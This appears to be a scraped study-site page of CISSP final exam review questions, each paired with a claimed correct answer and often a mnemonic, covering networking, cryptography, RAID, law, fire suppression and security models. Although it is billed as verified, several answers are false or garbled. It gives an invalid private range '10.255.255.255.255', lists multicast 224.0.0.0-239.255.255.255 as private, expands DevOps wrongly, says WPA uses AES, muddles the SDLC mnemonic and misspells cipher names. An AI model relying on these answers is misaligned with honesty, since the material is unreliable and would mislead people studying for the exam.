Download CISSP Final Exam Review With 100% Correct And Verified Answers 2024 and more Exams Advanced Education in PDF only on Docsity! CISSP Final Exam Review With 100% Correct And Verified Answers 2024 What are the stages in the TCP/IP model? - Correct Answer-"NITA" - Network Interface, Internet, Transport, Application How do you convert from OSI to TCP/IP layers? - Correct Answer-"3-1-1-2" starting from the top of the OSI and corresponding to the top of TCP/IP How many EALS in Common Criteria? - Correct Answer-7 List the EALS in Common Criteria - Correct Answer-"For Sure, My Mother, So Sweet Forever" Functional, Structural, Methodically x2, Methodically x3, Semi Formal x2, Semi-Formal x3, Formal What are the four stages of fire? - Correct Answer-"I'm So Freaking Hot" Incipient, Smoke, Flame, Heat What type of extinguisher should you use on combustible metals? - Correct Answer-Dry Powder How many layers in the ring model? - Correct Answer-0, 1, 2, and 3 EU-US Privacy Shield (what does it entail) - Correct Answer-"NCASDAR (3 are long)" XOR - Correct Answer-Same = 0 Different = 1 (Is basically subtracting them and taking absolute value) - If they are different, the absolute value of the difference is always one. If they are the same, the difference is always 0. GDPR/OECD - Correct Answer-"CDPU-SOIA-R" Collection Limitation, Data Quality, Purpose Specification, Usage Limitation, Security Framework, Openness, Individual Participation, Accountability, Right to Be Forgotten ISC2 Ethics - Correct Answer-There are 4: Protect Society Legally/Honorably Diligent to Principals Advance Profession Software Development Life Cycle (SDLC) - Correct Answer-"If I Don't Run, All Might Lose Out" Initial, Initializing, Define, Repeatable, Act, Manage, Learn, Optimize System and System Security Engineering - Correct Answer-"T-TEA" Technical, Technical Management, Enabling, Agreement How many control types? What are they? - Correct Answer-3 Physical, Tech/Logical, Admin/Management How many control categories? - Correct Answer-7 Describe SOX - Correct Answer-Can't lie to investors - defense against fraudulent accounting practices. 302 - C levels can go to jail for falsely signing 404 - Auditing standards What are some Asymmetric ciphers? - Correct Answer-"DEREK" Defi-Hellman, El-Gamal, RSA, Elliptical Curve Cryptology (ECC), Knapsack What are some Symmetric ciphers - Correct Answer-"23BRAIDS" 2fish, 3DES, Blowfish, RC5, AES, IDEA, DES, SHFER What type of biometric scanning is most intrusive? - Correct Answer-Retinal "retANAL" What security premise does the 4th amendment support? - Correct Answer-Privacy What is the formula for calculating the # of symmetric keys needed? - Correct Answer- (n(n-1))/2 What is the formula for calculating the # of ASYMMETRIC keys needed? - Correct Answer-2 * n What are the different strengths of AES? - Correct Answer-128, 192, 256 X.509 - Correct Answer-The most widely accepted format for digital certificates as defined by the International Telecommunication Union (ITU). WEP - Correct Answer-Wired Equivalence Protocol. Wireless network encryption system. CRACKED - do not use. Replaced by WPA POP3 (Post Office Protocol version 3) - Correct Answer-A protocol used from retrieving email from a mailbox on the mail server. Usually deletes email from server after it is received to user inbox. WPA - Correct Answer-Wireless Protected Access Uses AES WPA2 - Correct Answer-Wireless Protected Access 2 Uses AES What is the most common network topology? - Correct Answer-star network FM-200 - Correct Answer-"Fairly Magical" Gas Most likely to be used in a data center. Doesn't hurt computer equipment OR people. No residue or costly cleanup. RAM - Correct Answer-Primary Storage Volatile Vernam Cipher - Correct Answer-One-Time Pad Can most network IDSs tell if attacks are successful? - Correct Answer-No. Candidate Key - Correct Answer-database record that is unique Primary Key - Correct Answer-A field (or group of fields) that uniquely identifies a given entity in a table Foreign Key - Correct Answer-A primary key of one table that appears as an attribute in another table and acts to provide a logical relationship between the two tables DevOps - Correct Answer-Development, Assurance, Operations VAST - Correct Answer-"Very Agile Seeming Threat" Modeling Used in AGILE MTD/MAD - Correct Answer-Maximum Tolerable/Allowable Downtime (Before business comes crumbling down to permanent failure status) OpenID Connect - Correct Answer-Cloud Authentication (Used with OAuth 2.0) How many steps in Waterfall model? - Correct Answer-7 Parol Evidence Rule - Correct Answer-Written agreements always take precedence over oral agreements Written can only be changed by written Best evidence rule - Correct Answer-Copy is not admissible if original is available TOC/TOU Attack - Correct Answer-Race Condition Attack Use Complex Algorithms to confuse attack? Agile Software Development - Correct Answer-"High Autonomy, High Alignment" "Hippy DIppy" Uses VAST Threat Modeling, Scrum methodology, simplicity, face-to-face, SELF ORGANIZING TEAMS Team led RAID 0 - Correct Answer-No redundancy Striping Speedy 2-32 Drives RAID 1 - Correct Answer-Redundancy No Stripe "Mirror" Exactly 2 Drives RAID 5 - Correct Answer-Can Lose One (Redundancy) Stripe Speed 3+ Drives RAID 6 - Correct Answer-Can Lose Two (Redundancy) Strip Speed 4+ Drives RAID 1+0 (RAID 10) - Correct Answer-Can Lose Two Strip Mirror and Speed 4+ Private IP Ranges - Correct Answer-10.0.0.0 - 10.255.255.255.255 172.16.0.0 - 172.31.255.255 192.168.0.0 - 192.168.255.255 224.0.0.0 - 239.255.255.255 RADIUS - Correct Answer-Used for AAA, Open (Non-Proprietary) XTACACS - Correct Answer-OLD version of CISCO Proprietary AAA (like RADIUS) TACACS - Correct Answer-CISCO Proprietary AAA (like RADIUS) TACACS+ - Correct Answer-CISCO Proprietary AAA (like RADIUS) Accepts Multifactor Authentication Worms - Correct Answer-Can propogate (spread on their own without user interaction) Can non US citizens hold patents? - Correct Answer-Yes. Copywrite - Correct Answer-70 years after death Patent - Correct Answer-20 years Fuzz Testing - Correct Answer-A software testing technique that deliberately provides invalid, unexpected, or random data as inputs to a computer program. Risk = - Correct Answer-Threat X Vulnerability Pass Around Review - Correct Answer-Asynchronous Fagan Review - Correct Answer-Formal Process involving everyone together Steganography - Correct Answer-Hides data in another file (like a picture) Civilian Classifications - Correct Answer-Proprietary, Sensitive, Public Government Classifications - Correct Answer-Classification (Damage Dealt if Exposed) Top Secret (Grave Damage) Secret (Serious Damage) Confidential (Some Damage) Info Sec Program OWNER should be.... - Correct Answer-As senior as possible while still having ability to FOCUS on INFOSEC (likely won't be the CEO...) FISMA - Correct Answer-Federal Information Security Management Act Government Contractors Graham-Denning - Correct Answer-Monitor James Anderson - Correct Answer-Reference Monitor Harrison-Ruzzo-Ullman - Correct Answer-Access Control Matrix If there is no "I" in the acronym it is most likely NOT what kind of model? - Correct Answer-Integrity Biba - Correct Answer-Integrity Bell LaPadula - Correct Answer-Confidentiality MAC Mathematical Clark Wilson - Correct Answer-Integrity Brewer-Nash - Correct Answer-"Brewer-Nash(Wall - Chinese Wall)" Prevents Conflicts of Interest Used in lots of databases Block Ciphers - Correct Answer-Block Mode - ECB - No Error Block Mode - CBC - Error Stream Mode - CFB - Error Stream Mode - OFB - Error Stream Mode - CTR - No Error Private Cloud - Correct Answer-Only used by ONE Organization Null Cipher - Correct Answer-No algorithms, just hides plain text in other plain text Asset Classification is Driven Primarily By... - Correct Answer-Asset Value Where do you go when you are Recovering? - Correct Answer-To Backup Site Recover "Over" Where do you go when you are Restoring? - Correct Answer-To Original Site Restore "Back" What order do you RECOVER business processes? - Correct Answer-From highest to lowest priority What order do you RESTORE business processes? - Correct Answer-From lowest to highest priority What is the first step in auditing source code? - Correct Answer-Match "As-Built" to "As- Designed" Reference Monitor is the same as what? - Correct Answer-Security Kernel Security Kernel is the same as what? - Correct Answer-Reference Monitor What is the biggest concern with mobile devices? - Correct Answer-Loss of confidential data Guard against this by minimizing the amount of data on such devices. What are some hashes? - Correct Answer-SHA and MD5 ECC - Correct Answer-Elliptical Curve Cryptography What type of asymmetric algorithms is commonly used in mobile devices? - Correct Answer-ECC - Elliptical Curve Cryptography Accredidation - Correct Answer-Management's formal acceptance of the risk of bringing a product into the organization What are the four fastest types of storage on a PC? - Correct Answer-"RCRS" - "RC Racing Speed" Register, Cache, RAM, and Swap Space What is best (water) fire suppression system for computer equipment? - Correct Answer-Pre Action Cross-Site Scripting (XSS) - Correct Answer-An attack that injects scripts into a Web application server to direct attacks at clients. Combat with input validation (usually on web servers) Where should input validation methods be placed? - Correct Answer-On web servers Data Diddling - Correct Answer-Tampering with data input into data tables Phlashing - Correct Answer-malicious code embedded into BIOS or firmware -frequently used to remote control Port Address Translation (PAT) - Correct Answer-A port number is tracked with the client computer's private address when translating to a public address Community Cloud - Correct Answer-two or more organizations pool their resources Take-Grant Protection MOdel - Correct Answer-Take, Grant, Create, and Remove How to monitor traffic between two VMs? - Correct Answer-Use virtual port with virtual IDS Lightweight Directory Access Protocol (LDAP) - Correct Answer-A protocol used by various client applications when the application needs to query a database. Open Source Metasploit - Correct Answer-A penetration-testing tool that combines known scanning techniques and exploits to explore potentially new types of exploits. Users can create their own. Decentralized Access Control - Correct Answer-A system that puts access control into the hands of people such as department managers who are closest to system users; there is no one centralized entity to process access requests in this system. Service Provisioning Markup Language (SPML) - Correct Answer-An open standard for exchanging authorization information between cooperating organizations. OASIS developed Bastion Host - Correct Answer-A heavily secured server located on a special perimeter network between the company's secure internal network and its firewall. Ingress - Correct Answer-incoming traffic Egress - Correct Answer-outgoing traffic Hearsay Rule - Correct Answer-"Can't testify about what someone else told you" Also means that you can't present data logs someone gave to you, especially not when the admin can testify on behalf of the data they pulled. EAP (Extensible Authentication Protocol) - Correct Answer-A protocol that enables systems to use hardware-based identifiers, such as fingerprint scanners or smart card readers, for authentication.